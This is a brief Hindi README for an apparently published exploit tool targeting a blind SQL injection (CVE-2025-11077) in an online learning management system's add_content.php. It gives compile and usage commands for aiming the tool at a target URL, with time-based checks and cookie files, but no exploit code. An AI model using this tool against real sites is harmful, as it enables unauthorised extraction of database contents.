
अंध SQL इंजेक्शन का शोषण करें (ऑनलाइन शिक्षण प्रबंधन प्रणाली)
लेखक: Byte Reaper
यह कमजोरी ऑनलाइन लर्निंग मैनेजमेंट सिस्टम (CVE-2025-11077) की add_content.php फ़ाइल में एक ब्लाइंड SQL इंजेक्शन है, जो हमलावर को तैयार POST अनुरोध भेजकर डेटाबेस जानकारी निकालने की अनुमति देती है।
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HELP :
./CVE-2025-11077 -h
- Target URL (base url)
./CVE-2025-11077 -u http://[IP]
- log file :
./CVE-2025-11077 -f [FILE]
- Check time-based blind :
./CVE-2025-11077 -u http://[IP] -b
- Cookies FILE :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT